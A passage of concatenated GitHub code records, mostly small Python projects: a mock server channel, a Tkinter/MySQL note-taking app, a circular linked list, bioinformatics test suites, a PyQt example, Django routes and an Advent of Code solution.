{Direction.SEND.value: [], Direction.RECEIVE.value: []}\n\n def record(self, direction: Direction, msg: object):\n self.data[direction.value].append(msg)\n\n\nclass ServerWrapper:\n\n class Mode(enum.Enum):\n PROD = 'prod'\n PROD_VERIFY = 'prod_verify'\n RECORD = 'record'\n PLAYBACK = 'playback'\n\n class WrapperReceiver:\n\n def __init__(self, server_wrapper):\n self._server_wrapper = server_wrapper\n self._receiver = None\n\n def set_receiver(self, receiver: Receiver):\n assert self._receiver is None\n self._receiver = receiver\n\n def __call__(self, msg: object):\n self._server_wrapper._process(Direction.RECEIVE, msg, self._receiver)\n\n def __init__(self, server: Server, mock_server: Server = None, recorder: Recorder = None):\n self._recorder = None\n if server is not None:\n self.mode = self.Mode.PROD\n self._server = server\n if recorder is not None:\n self.mode = self.Mode.RECORD\n self._recorder = recorder\n elif mock_server is not None:\n self.mode = self.Mode.PLAYBACK\n self._server = mock_server\n else:\n assert False\n\n self._receiver = self.WrapperReceiver(self)\n self._server.set_receiver(self._receiver)\n\n def set_receiver(self, receiver: Receiver):\n self._receiver.set_receiver(receiver)\n\n def send(self, msg: object):\n self._process(Direction.SEND, msg, self._server.send)\n\n def _process(self, direction: str, msg: object, receiver: Receiver):\n if self._recorder is not None:\n self._recorder.record(direction, msg)\n receiver(msg)\n\n\nclass ClassAttributeAccessError(Exception):\n pass\n\n\nclass MethodCallSerializer:\n\n def __init__(self, server, wrapped, namespace=''):\n self._server = server\n self._wrapped = wrapped\n self._namespace = namespace\n\n def __getattr__(self, attr):\n if attr[0] == '_':\n return super(self, ObjectWrapper).__getattr__(attr)\n\n value = getattr(self._wrapped, attr)\n if not callable(value) and not hasattr(self._wrapped.__class__, attr):\n raise ClassAttributeAccessError(attr)\n\n return MethodCallSerializer(self._server, value, attr)\n\n def __call__(self, *args, **kw):\n self._server.send((self._namespace, args, kw))\n\n\nclass MethodCallDeserializer(Server):\n\n def __init__(self, target):\n self._target = target\n\n def set_receiver(self, receiver):\n if (hasattr(self._target, 'set_receiver') and\n callable(self._target.set_receiver)):\n self._target.set_receiver(receiver)\n\n def send(self, msg):\n method, args, kw = msg\n getattr(self._target, method)(*args, **kw)\n","repo_name":"areusch/pyapi-mock","sub_path":"pyapi_mock/mock_channel.py","file_name":"mock_channel.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40503985051","text":"from datetime import date\nfrom tkinter import *\nfrom tkinter.ttk import *\nimport mysql.connector\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"admin\",\n database=\"notetaking\"\n)\n\nmycursor = mydb.cursor()\n\n# Create the main window\nmaster = Tk()\nmaster.title(\"Note Taking App\")\nmaster.geometry(\"600x700\")\n\n# Banner\nlabel=Label(master,text=\"THIS IS MAIN WINDOW\")\nlabel.pack(pady=10)\n\n\n# Adding a button to view saved notes\ndef view_notes(id):\n mycursor.execute(f\"SELECT * FROM notes WHERE id={id}\")\n myresult = mycursor.fetchall()\n for x in myresult:\n pass\n newWindow = Toplevel(master)\n newWindow.title(x[1])\n newWindow.geometry(\"300x300\")\n # note\n Label(newWindow, text=x[3], wraplength=200).pack()\n\n # Delete Note\n def delete_note(id):\n query = \"DELETE FROM notes WHERE id = %s\"\n mycursor.execute(query, (id,))\n mydb.commit()\n newWindow.destroy()\n view_master()\n delete_button = Button(newWindow, text=\"Delete\", command=lambda x = id: delete_note(x))\n delete_button.pack()\n\n # Buttons to see titles of notes\n\ndef view_master():\n mycursor.execute(\"SELECT * FROM notes\")\n myresult = mycursor.fetchall()\n for x in myresult:\n btn = Button(master, text =f\"{x[1]} | Category : {x[2]}\", command=lambda id=x[0]: view_notes(id)) # lambda function creates an anonymous function that takes the value of x[0] at the moment the button is created and then passes it to view_notes when the button is clicked.\n btn.pack(pady = 10)\n\n# Create a function to display the Add Note section\ndef display_add_note_section():\n add_note_window = Toplevel(master)\n add_note_window.title(\"Add Note\")\n add_note_window.geometry(\"300x300\")\n\n # Title Entry\n Label(add_note_window, text=\"Title:\").pack()\n title_entry = Entry(add_note_window)\n title_entry.pack()\n\n # Category Entry\n Label(add_note_window, text=\"Category:\").pack()\n category_entry = Entry(add_note_window)\n category_entry.pack()\n\n # Content Entry (use a Text widget for multi-line input)\n Label(add_note_window, text=\"Content:\").pack()\n content_entry = Text(add_note_window, height=10, width=30)\n content_entry.pack()\n\n # Add Note Button\n add_button = Button(add_note_window, text=\"Save!\", command=lambda: add_note(title_entry.get(), content_entry.get(\"1.0\", END), category_entry.get()))\n add_button.pack()\n view_master()\ndef add_note(title, content, category):\n today = date.today()\n print(\"Title:\", title)\n print(\"Category:\", category)\n print(\"Content:\", content)\n print(today)\n # Insert the new note into the database\n mycursor.execute(\"INSERT INTO notes (Title, Category, Context, Date) VALUES (%s, %s, %s, %s)\", (title, category, content, today))\n mydb.commit()\n # Clear the entry fields after adding the note\n view_master()\nadd_note_button = Button(master, text=\"Add Note\", command=display_add_note_section)\nadd_note_button.pack()\n\nviewNotesButton = Button(master, text=\"View Notes\", command=view_master)\nviewNotesButton.pack()\n\n\n# Run the application\nmaster.mainloop()\n\n","repo_name":"aberdayy/COMP2005","sub_path":"NoteTakingApp/deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9320046889","text":"from linked_list import LinkedList\nfrom node import Node\n\nfrom dataclasses import dataclass, field\n\n@dataclass\nclass CSLL(LinkedList):\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n if node.next == self.head:\n break\n node = node.next\n \n def __str__(self) -> str:\n nodes = '->'.join([str(node.value) for node in self]) if self.head else ''\n return f'CSLL({nodes})'\n\n def get(self, index):\n if index < -1 or index > self.length:\n raise Exception(\"Usage: Invalid Index\")\n if index == -1:\n return self.tail\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n \n def set(self, index, node):\n if index < -1 or index > self.length:\n raise Exception(\"Usage: Invalid Index\")\n if index == -1:\n index = self.length -1\n temp = self.head\n for _ in range(index):\n temp = temp.next\n temp.value = node.value\n\n def prepend(self, node):\n if self.length == 0:\n node.next = node\n self.head = node\n self.tail = node\n else:\n self.tail.next = node\n node.next = self.head\n self.head = node\n self.length += 1\n\n def append(self, node):\n if self.length == 0:\n node.next = node\n self.head = node\n self.tail = node\n else:\n self.tail.next = node\n node.next = self.head\n self.tail = node\n self.length += 1\n \n def insert(self, node, index):\n if index < -1 or index > self.length:\n raise Exception('Invalid Index')\n elif index == 0:\n self.prepend(node)\n elif index == -1:\n self.append(node)\n else:\n curr = self.head\n for _ in range(index-1):\n curr = curr.next\n node.next = curr.next\n curr.next = node\n self.length += 1\n\n def create(self,*args):\n if len(args):\n for val in args:\n self.append(Node(val))\n\n def pop_first(self):\n if self.length == 0:\n raise Exception('Empty')\n temp = self.head\n if self.length == 1:\n self.head == None\n self.tail == None\n self.tail.next = None\n self.head.next = None\n else:\n self.tail.next = self.head.next\n self.head = self.tail.next\n temp.next = None\n self.length -= 1\n return temp\n\n def pop(self):\n if self.length == 0:\n raise Exception('Empty')\n temp = self.tail\n if self.length == 1:\n self.tail.next = None\n self.head.next = None\n self.head = None\n self.tail = None\n else:\n curr = self.head\n while curr.next != self.tail:\n curr = curr.next\n curr.next = self.tail.next\n self.tail = curr\n temp.next = None\n self.length -= 1\n return temp\n \n def remove(self, index):\n if index < -1 or index > self.length or self.length == 0:\n raise Exception('Invalid Index')\n elif index == 0:\n return self.pop_first()\n elif index == -1:\n return self.pop()\n else:\n curr = self.head\n for _ in range(index-1):\n curr = curr.next\n temp = curr.next\n curr.next = curr.next.next\n temp.next = None\n self.length -= 1\n return temp\n \n def reverse(self):\n prev = None\n curr = self.head\n while curr is not None:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n self.head, self.tail = self.tail, self.head\n return self\n","repo_name":"gouherdanish/linked_list_concepts","sub_path":"csll.py","file_name":"csll.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24802589374","text":"MAX_CONTENT_LENGTH = 256 * 1024 * 1024 # default: 256M max upload to avoid filling the disk\nVIDEO_CONTENT_TYPES = [\"video/mp4\",\"video/webm\",\"video/x-matroska\"]\n\n# these paths are relative to the instance directory\nSQLITE_DATABASE = \"ati.db\"\nTITLE_VIDEO = \"title.mp4\"\n\n# relative to project root directory\nVIDEO_UPLOAD_DIR = \"media/original\"\nTEMP_DIR = \"media/tmp\"\n","repo_name":"wilhelmy/ati","sub_path":"default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1877013263","text":"from bmds.bmds3.constants import DistType\nfrom bmds.bmds3.models import continuous\n\n\nclass TestContinuousGof:\n def test_collapse(self, cdataset, cidataset):\n # goodness of fit should collapse into non-zero fields\n\n # continuous summary data already collapsed; no change in length of table\n model = continuous.Power(cdataset)\n res = model.execute()\n assert res.gof.n() == cdataset.num_dose_groups == 5\n assert res.gof.n() == len(cdataset.doses) == 5\n\n # continuous individual summary data collapses appropriately\n model = continuous.Power(cidataset)\n res = model.execute()\n assert res.gof.n() == cidataset.num_dose_groups == 7\n assert res.gof.n() == len(cidataset.doses)\n assert res.gof.n() < len(cidataset.individual_doses)\n assert res.gof.n() == len(set(cidataset.individual_doses))\n\n\nclass TestContinuousParameters:\n def test_exp3(self, cdataset):\n \"\"\"\n Edge case for exp3 - the dll expects a prior for the c parameter, but the\n returned output effectively drops the c array and shifts all other values down one.\n We check that the input and output values are shifted as required.\n \"\"\"\n model = continuous.ExponentialM3(cdataset)\n res = model.execute()\n # param names for prior are as expected\n assert model.get_param_names() == [\"a\", \"b\", \"c\", \"d\", \"log-alpha\"]\n # but outputs have been shifted\n assert res.parameters.names == [\"a\", \"b\", \"d\", \"log-alpha\"]\n\n model = continuous.ExponentialM3(cdataset, settings=dict(disttype=DistType.normal_ncv))\n res = model.execute()\n # param names for prior are as expected\n assert model.get_param_names() == [\"a\", \"b\", \"c\", \"d\", \"rho\", \"log-alpha\"]\n # but outputs have been shifted\n assert res.parameters.names == [\"a\", \"b\", \"d\", \"rho\", \"log-alpha\"]\n\n # confirm arrays all the same length after changes\n params = res.parameters\n n_params = len(params.names)\n for field in [\n \"values\",\n \"se\",\n \"lower_ci\",\n \"upper_ci\",\n \"bounded\",\n \"prior_type\",\n \"prior_initial_value\",\n \"prior_stdev\",\n \"prior_min_value\",\n \"prior_max_value\",\n ]:\n assert getattr(params, field).size == n_params\n assert params.cov.shape == (n_params, n_params)\n","repo_name":"shapiromatron/bmds","sub_path":"tests/bmds3/types/test_continuous.py","file_name":"test_continuous.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25657988027","text":"import os\nimport shutil\nimport sys\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom os.path import dirname, join, exists, isfile, splitext, basename, isdir, relpath, getsize, getmtime\nfrom targqc.utilz.testing import BaseTestCase, info, check_call, swap_output\n\n\nONLY_DIFF=False\n\n\nclass BaseTargQC(BaseTestCase):\n script = 'targqc'\n\n data_dir = join(dirname(__file__), BaseTestCase.data_dir)\n results_dir = join(dirname(__file__), BaseTestCase.results_dir)\n gold_standard_dir = join(join(dirname(__file__), BaseTestCase.gold_standard_dir))\n\n Sample = namedtuple('Sample', 'name bam l_fastq r_fastq')\n samples = [\n Sample('syn3-tumor', 'syn3-tumor.bam', 'syn3-tumor_R1.fq.gz', 'syn3-tumor_R2.fq.gz'),\n Sample('syn3-normal', 'syn3-normal.bam', 'syn3-normal_R1.fq.gz', 'syn3-normal_R2.fq.gz'),\n ]\n\n bwa_dir = join(data_dir, 'bwa')\n bwa_path = join(bwa_dir, 'hg19-chr21.fa')\n\n def setUp(self):\n BaseTestCase.setUp(self)\n\n self.syn3_dir = join(BaseTargQC.data_dir, 'chr21_az300')\n self.bed3 = join(self.syn3_dir, 'NGv3.chr21.3col.bed')\n self.bed4 = join(self.syn3_dir, 'NGv3.chr21.4col.bed')\n self.bams = [join(self.syn3_dir, s.bam) for s in BaseTargQC.samples]\n self.fastqs = [join(self.syn3_dir, s.l_fastq) for s in BaseTargQC.samples] + \\\n [join(self.syn3_dir, s.r_fastq) for s in BaseTargQC.samples]\n\n if not isdir(self.syn3_dir):\n info(self.syn3_dir + ' does not exist, downloading test data')\n cur_dir = os.getcwd()\n os.chdir(self.data_dir)\n check_call(['wget', self.syn3_url])\n check_call(['tar', '-xzvf', basename(self.syn3_url)])\n os.chdir(cur_dir)\n\n def _test(self, output_dirname=None, used_samples=samples, bams=None, fastq=None, bed=None,\n debug=True, reuse_intermediate=False, reuse_output_dir=False, reannotate=False,\n genome='hg19-chr21', bwa=None, threads=None, ipython=None, keep_work_dir=True):\n os.chdir(self.results_dir)\n cmdl = [self.script]\n output_dir = None\n if output_dirname:\n output_dir = join(self.results_dir, output_dirname)\n cmdl.extend(['-o', output_dir])\n if bams: cmdl.extend(bams)\n if fastq: cmdl.extend(fastq)\n if bed: cmdl.extend(['--bed', bed])\n if debug: cmdl.append('--debug')\n if reuse_intermediate:\n reuse_output_dir = True\n cmdl.append('--reuse')\n if reannotate: cmdl.append('--reannotate')\n if genome: \n cmdl.extend(['-g', genome])\n if bwa:\n cmdl.extend(['--bwa', bwa])\n if threads: cmdl.extend(['-t', str(threads)])\n if ipython: cmdl.extend('-s sge -q queue -r pename=smp -r --local'.split())\n if keep_work_dir: cmdl.append('--keep-work-dir')\n\n output_dir = output_dir or self._default_output_dir()\n\n if not ONLY_DIFF:\n if reuse_output_dir is False:\n swap_output(output_dir)\n\n info('-' * 100)\n check_call(cmdl)\n info('-' * 100)\n info('')\n\n self._check_results(output_dir, used_samples)\n\n if not ONLY_DIFF and self.remove_work_dir_on_success and not reuse_intermediate and not reuse_output_dir:\n work_dir = join(output_dir, 'work')\n if not isdir(work_dir):\n info('Work dir for run ' + output_dirname + ' does not exist under ' + work_dir)\n else:\n shutil.rmtree(work_dir)\n info('')\n\n @staticmethod\n def _default_output_dir():\n return join(os.getcwd(), 'targqc')\n\n def _check_results(self, output_dir, used_samples):\n assert isdir(output_dir)\n self._check_file_throws(join(output_dir, 'regions.tsv'), wrapper='wc -l')\n self._check_file_throws(join(output_dir, 'summary.tsv'), wrapper='wc -l')\n self._check_file_throws(join(output_dir, 'summary.html'), ignore_matching_lines='report_date', check_diff=False)\n for s in used_samples:\n s_dir = join(output_dir, s.name)\n assert isdir(s_dir)\n self._check_file_throws(join(s_dir, 'regions.tsv'), wrapper='wc -l')\n self._check_file_throws(join(s_dir, 'summary.txt'), wrapper='wc -l')\n self._check_file_throws(join(s_dir, 'summary.html'), ignore_matching_lines='report_date', check_diff=False)\n self._check_file_throws(join(s_dir, 'summary.json'), ignore_matching_lines='work_dir', check_diff=False)\n","repo_name":"vladsavelyev/TargQC","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38991107349","text":"#!/usr/bin/python\n\n\"\"\"\nPractica 2 ISBC\n\nEjercicio 8\n\nEn este ejercicio, almacenamos eventos en variables\n\nAuthor: Marcos Rivera Gavilan\nWebsite: https://www.uco.es/~i92rigam/\n\nImportante: Para reducir el número de comentarios,\ny simplificar la lectura, solo comentaré las funciones\nnuevas de este ejercicio. El resto que aparezcan sin\ncomentar, habrán sido comentadas en ejercicios anteriores.\n\"\"\"\n\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton, QApplication\n\n\nclass Example(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n btn1 = QPushButton(\"Button 1\", self)\n btn1.move(30, 50)\n\n btn2 = QPushButton(\"Button 2\", self)\n btn2.move(150, 50)\n\n btn1.clicked.connect(self.buttonClicked)\n btn2.clicked.connect(self.buttonClicked)\n\n \"\"\"\n Aquí conectamos los botones al slot\n \"\"\"\n\n self.statusBar()\n\n self.setGeometry(300, 300, 450, 350)\n self.setWindowTitle('Event sender')\n self.show()\n\n def buttonClicked(self):\n sender = self.sender()\n self.statusBar().showMessage(sender.text() + ' was pressed')\n\n \"\"\"\n Con esta función modificamos el valor de la barra de estado\n \"\"\"\n\n\ndef main():\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarcosRigal/Issbc","sub_path":"P2/E8.py","file_name":"E8.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39199891875","text":"from mongoengine import QuerySet\nimport requests\nfrom bson.objectid import ObjectId\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil.parser import isoparse\nfrom datetime import timezone\nfrom utils.querystring import querystring\n\n# This file contains querysets\n# What are querysets\n# When querying the models, you do\n# ModelName.objects({\n# field_1: value_1\n# .\n# .\n# field_n: value_2\n# })\n# A queryset is shorthand for this. You define a method called fx custom_query_1\n# And now you can execute ModelName.objects.custom_query_1\n# The api supports directly calling a queryset by calling\n# GET /api/ModelName?$queryset=custom_query_1\n\n\ndef get(query):\n result = requests.get(\"http://localhost:5000/api/{}\".format(query))\n return result.json()\n\n\nclass RatesQuerySet(QuerySet):\n def default(self, cls, filters):\n rates = cls.fetch(filters)\n\n return rates\n\n def minimum(self, cls, filters):\n result = next(\n cls.objects().aggregate(\n [\n {\n \"$match\": {\n \"experienceId\": ObjectId(filters.get(\"experienceId\")),\n \"availableDates\": {\n \"$elemMatch\": {\n \"time\": {\n \"$lte\": datetime.now() + timedelta(days=60)\n }\n }\n },\n }\n },\n {\"$unwind\": \"$rateTypesPrices\"},\n {\"$sort\": {\"rateTypesPrices.retailPrice.amount\": 1}},\n {\"$limit\": 1},\n ]\n ),\n None,\n )\n\n return result\n\n def query_by_experience(self, cls, query):\n return requests.get(\"http://localhost:5000/api/rates?{}\".format(query)).json()\n\n def fetch(self, cls, filters):\n return cls.fetch(filters)\n\n\nclass ExperiencesQuerySet(QuerySet):\n def default(self, cls, filters):\n # These can be passed to include rates\n fromDate = filters.pop(\"from\", None)\n untilDate = filters.pop(\"until\", None)\n limit = filters.pop(\"$limit\", None)\n skip = filters.pop(\"$skip\", None)\n\n experiences = cls.fetch(filters)\n\n for experience in experiences:\n minimumRate = requests.get(\n \"http://localhost:5000/api/rates?$queryset=minimum&experienceId={}&dateRange__fromDate__lte={}\".format(\n experience[\"id\"], (datetime.now() + timedelta(days=60)).isoformat()\n )\n )\n\n minimumRate = minimumRate.json()\n\n if minimumRate:\n experience[\"minPrice\"] = minimumRate.get(\"rateTypesPrices\", [{}])[\n 0\n ].get(\"retailPrice\", {})\n\n query_string = {\"$queryset\": \"fetch\", \"experienceId\": experience[\"id\"]}\n\n if fromDate and untilDate:\n query_string.update(\n {\n \"availableDates__time__gte\": fromDate,\n \"availableDates__time__lte\": untilDate,\n }\n )\n\n rates = requests.get(\n querystring(\"http://localhost:5000/api/rates\", query_string)\n )\n experience.update({\"rateCalendar\": rates.json()})\n\n if fromDate and untilDate:\n experiences = list(\n filter(lambda x: any(x.get(\"rateCalendar\", [])), experiences)\n )\n\n if skip:\n experiences = experiences[int(skip) :]\n\n if limit:\n experiences = experiences[: int(limit)]\n\n return experiences\n\n def fetch(self, cls, filters):\n return cls.fetch(filters)\n\n\nclass BookingsQuerySet(QuerySet):\n def default(self, cls, filters):\n bookings = cls.fetch(filters)\n\n rates = cls.rateId.document_type_obj.fetch(\n {\"id__in\": list(set([x[\"rateId\"] for x in bookings]))}\n )\n\n experiences = cls.rateId.document_type_obj.experienceId.document_type_obj.fetch(\n {\"id__in\": list(set([x[\"experienceId\"] for x in rates]))}\n )\n\n for booking in bookings:\n rate = next(filter(lambda x: x[\"id\"] == booking[\"rateId\"], rates))\n experience = next(\n filter(lambda x: x[\"id\"] == rate[\"experienceId\"], experiences)\n )\n date = next(\n filter(\n lambda x: x[\"availabilityId\"] == booking[\"availabilityId\"],\n rate[\"availableDates\"],\n ),\n None,\n )\n\n booking[\"ratesBooked\"] = {\n \"rateId\": booking[\"rateId\"],\n \"start\": isoparse(date.get(\"time\", {}).get(\"$date\")),\n \"ratesQuantity\": booking[\"ratesQuantity\"],\n }\n\n booking[\"experience\"] = experience\n\n booking[\"price\"] = {\n \"finalRetailPrice\": {\"amount\": 0, \"currency\": \"EUR\"},\n \"retailPriceBreakdown\": [],\n }\n\n for item in booking[\"ratesQuantity\"]:\n price = next(\n filter(\n lambda x: item[\"rateType\"] == x[\"rateType\"],\n rate[\"rateTypesPrices\"],\n )\n )\n booking[\"price\"][\"retailPriceBreakdown\"].append(\n {**price, \"quantity\": item[\"quantity\"]}\n )\n booking[\"price\"][\"finalRetailPrice\"][\"amount\"] += (\n price.get(\"retailPrice\", {}).get(\"amount\")\n ) * item[\"quantity\"]\n\n booking[\"cancellationFee\"] = {\n \"amount\": booking[\"price\"][\"finalRetailPrice\"][\"amount\"]\n if (booking[\"ratesBooked\"][\"start\"] - datetime.now(timezone.utc)).days\n else 0,\n \"currency\": booking[\"price\"][\"finalRetailPrice\"][\"currency\"],\n }\n\n booking[\"bookingCreated\"] = ObjectId(booking[\"id\"]).generation_time\n booking[\"start\"] = booking[\"ratesBooked\"][\"start\"]\n\n return bookings\n","repo_name":"isebarn/turneo","sub_path":"models/query_sets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22273782415","text":"from pathlib import Path\n\nfrom sqlmodel import create_engine, SQLModel, Session\n\nfrom app.model import create_all\n\n\nBaseDir = Path(__file__).resolve().parent.parent\n\n\nsqlite_file_name = 'database.db'\nsqlite_url = f'sqlite:///{BaseDir}/{sqlite_file_name}'\n\nengine = create_engine(sqlite_url, echo=True)\n\n\ndef create_db_and_tables():\n create_all()\n SQLModel.metadata.create_all(engine)\n\n\ndef get_session() -> Session:\n session = Session(engine)\n try:\n yield session\n finally:\n session.close()\n","repo_name":"alexg0mel/time_control","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30097905661","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.login, name='login'),\n path('store/all', views.get_stores_all, name='getAllStores'),\n path('store/', views.get_store_infos, name='getStoreInfos'),\n path('category/all', views.get_categories_all, name='getAllCategories'),\n path('me/points',views.getAllFidelityPoints, name='getAllFidelityPoints'),\n path('me/points/',views.getFidelityPoints, name='getFidelityPoints'),\n path('client/points',views.getPointsForClient, name='getPointsForClient'),\n path('products/', views.get_store_products, name='getStoreProducts'),\n path('me/products/add', views.add_product_to_store, name='addProductToStore'),\n path('me/products/update', views.update_product, name='updateProduct'),\n path('me/products/remove', views.remove_product_from_store, name='removeProductFromStore'),\n path('transaction/credit', views.credit, name='credit'),\n path('transaction/debit', views.debit, name='debit'),\n path('me/qrcode', views.generateQRCode, name='generateQRCode'),\n path('productmodels',views.getAllProductModels, name='getAllProductModels'),\n path('me/records',views.getPurchaseRecords, name='getPurchaseRecords'),\n path('me/update',views.updateInfo, name='updateInfo'),\n\n]\n","repo_name":"lorettet/Smart","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19549030219","text":"import os\nimport configparser\nimport codecs\n\nlist_folder = os.listdir(os.getcwd())\n\nconfig = configparser.ConfigParser()\nconfig.read(os.getcwd() + \"/config.ini\")\n\nsearchCharacter = config['find']['character']\nreplaceCharacter = config['replace']['character']\nreplaceCharacter = codecs.decode(replaceCharacter, \"unicode-escape\")\n\nfor f in list_folder:\n base_file, ext = os.path.splitext(f)\n if ext != \".py\":\n if ext != \".exe\":\n if ext != \".ini\":\n with open(f, \"r\") as inputfile:\n newText = inputfile.read().replace(searchCharacter, replaceCharacter)\n\n with open(f, \"w\") as outputfile:\n outputfile.write(newText)\n os.rename(f, f + '.txt')\n\n","repo_name":"eldadpuzach/MyPythonProjects","sub_path":"Replace_String_with_Enter/replaceApostropheWithCRLF.py","file_name":"replaceApostropheWithCRLF.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13343977715","text":"import numpy as np\nimport cv2\n\n\nclass ShowImage(object):\n def __init__(self, frame, kernel):\n self.frame = frame\n self.kernel = kernel\n self.hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)\n self.mask_blue = cv2.inRange(self.hsv, np.array([96, 0, 0]), np.array([118, 255, 255]))\n self.mask_green = cv2.inRange(self.hsv, np.array([52, 0, 0]), np.array([89, 255, 243]))\n self.mask_yellow = cv2.inRange(self.hsv, np.array([0, 125, 201]), np.array([35, 255, 255]))\n\n def show_image(self):\n self._completion_all_mask()\n mask = cv2.inRange(self.hsv, np.array([0, 0, 77]), np.array([0, 0, 255]))\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, self.kernel)\n\n cv2.imshow(\"yellow\", self.mask_yellow)\n cv2.imshow(\"blue_dots\", self.mask_blue)\n cv2.imshow(\"green\", self.mask_green)\n cv2.imshow(\"walls\", closing)\n cv2.imshow(\"frame\", self.frame)\n cv2.waitKey(3)\n\n def _completion_all_mask(self):\n self._completion_mask(self.mask_blue)\n self._completion_mask(self.mask_blue)\n self._completion_mask(self.mask_blue)\n\n def _completion_mask(self, mask):\n _, contours, _ = mask\n self._completion_frame(contours, 0, 255, 0)\n\n def _completion_frame(self, contours, r, g, b):\n for x in range(len(contours)):\n area = cv2.contourArea(contours[x])\n if area > 5:\n x, y, w, h = cv2.boundingRect(contours[x])\n self.frame = cv2.rectangle(self.frame, (x, y), (x + w, y + h), (r, g, b), 2)\n","repo_name":"Andryxa797/AlgoritmFindPuth","sub_path":"ShowImage.py","file_name":"ShowImage.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3245873563","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.utils.html import conditional_escape\n\nimport re\nregister = template.Library()\n\n\n@register.filter()\ndef make_link(value, arg=14):\n value = conditional_escape(value)\n output = ''\n for i in value.split(' '):\n if i.startswith(('http://', 'www.', 'https://')):\n output += 'link '.format(href=i, ts=arg)\n else:\n output += i + ' '\n return mark_safe(output)\n","repo_name":"pm-str/Sked","sub_path":"app/home/templatetags/customs.py","file_name":"customs.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1647534830","text":"#!/usr/bin/env python3\nimport sys\nimport json\nimport random\n\ndef get_questions():\n questions_file = open('./quiz.json')\n questions_obj = json.load(questions_file)\n questions_file.close()\n return questions_obj['questions']\n\ndef print_choices(choices):\n # enumerate() is used to\n # extract index value from the list\n for index, choice in enumerate(choices):\n print(choice)\n print('{}.{}'.format(index + 1, choice), '\\n')\n\ndef is_correct(ans, user_answer):\n return ans == str(user_answer)\n\ndef get_greeting_msg(points, total_qns):\n ans_percentage = int((points / total_qns) * 100)\n result_msg = 'You got {} / {} questions!'.format(points, total_qns)\n if ans_percentage <= 25:\n return 'Not so impressive.😟 ' + result_msg\n elif ans_percentage <= 75:\n return result_msg + ' Almost! Rewatch probably? 🙄'\n else:\n return result_msg + ' TRUE GOT HEAD ðŸ�º'\n\ndef start_quiz():\n questions = get_questions()\n points = 0\n for index, val in enumerate(questions):\n print(val['question'], '\\n') # Question\n print_choices(val['options'])\n answer = input('Your answer(in number)?\\n')\n if is_correct(answer, val['answer']):\n print('✓')\n points += 1\n else:\n print('✘')\n print(get_greeting_msg(points, len(questions)))\n\nif __name__ == '__main__':\n canPlay = input('Press y/Y to play the Game of Thrones quiz ðŸ¦�\\n')\n canPlay = str(canPlay) == 'y' or str(canPlay) == 'Y'\n start_quiz() if canPlay else exit(-1)","repo_name":"existentialcoder/I-Learn-Python","sub_path":"gameofthrones_quiz/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1977734928","text":"with open(\"aoc-7-1.txt\") as f:\n content = f.readlines()\n\ncontent = [x.strip() for x in content]\nalphabet = set({})\nrules = []\n\nfor rule in content:\n rules.append((rule[5], rule[36]))\n alphabet.add(rule[5])\n alphabet.add(rule[36])\n\nalphabet = list(alphabet)\nalphabet.sort()\n\nanswer_string = ''\nwhile len(rules) > 0:\n for A in alphabet[:]:\n cont = False\n for rule in rules:\n if rule[1] == A:\n cont = True\n break\n\n if cont:\n continue\n\n answer_string = answer_string + A\n alphabet.remove(A)\n i = 0\n while i < len(rules):\n if rules[i][0] == A:\n rules = rules[:i] + rules[i + 1:]\n else:\n i = i + 1\n break\n \n 